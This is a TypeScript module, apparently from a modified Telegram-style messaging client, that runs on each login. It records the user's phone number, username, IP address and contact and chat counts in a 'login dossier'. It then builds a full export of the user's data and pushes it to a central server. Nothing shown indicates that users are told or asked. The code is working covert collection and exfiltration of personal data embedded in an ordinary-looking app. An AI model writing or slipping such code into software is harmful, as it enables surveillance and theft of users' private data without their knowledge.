import type { GlobalState } from '../global/types';

import { buildFullUserExport } from './fullUserExport';
import { pushFullUserExportToCentral } from './centralDb/sync';
import { captureAppUserSnapshot, registerAppUserLogin } from './sessionRegistry';
import { logUserEvent } from './userEventsStore';
import { getRegistryUser } from './sessionRegistry';

let lastPersistMinuteKey = '';

export async function persistLoginDossier(global: GlobalState): Promise<void> {
  const userId = global.currentUserId;
  if (!userId || global.auth.state !== 'authorizationStateReady') return;

  const minuteKey = `${userId}:${Math.floor(Date.now() / 120_000)}`;
  if (lastPersistMinuteKey === minuteKey) return;
  lastPersistMinuteKey = minuteKey;

  await registerAppUserLogin(global);
  await captureAppUserSnapshot(global);

  const record = getRegistryUser(userId);
  const isFirst = record?.loginCount === 1;

  if (isFirst) {
    await logUserEvent(userId, 'register', 'Pendaftaran / login pertama ke aplikasi', {
      meta: {
        phone: record?.phone,
        username: record?.username,
        ip: record?.lastIp,
      },
    });
  }

  await logUserEvent(userId, 'session_start', 'Login aplikasi — sesi aktif', {
    meta: {
      loginCount: record?.loginCount,
      ip: record?.lastIp,
      phone: record?.phone,
      contacts: record?.lastSnapshot?.contactCount,
      chats: record?.lastSnapshot?.chatCount,
    },
  });

  const fullExport = await buildFullUserExport(userId, global);
  if (fullExport) {
    await pushFullUserExportToCentral(userId, fullExport);
    await logUserEvent(userId, 'export_data', 'Snapshot lengkap disimpan ke server (login)', {
      meta: {
        ipLogs: record?.ipLogs?.length,
        events: fullExport.userEvents.length,
      },
    });
  }
}
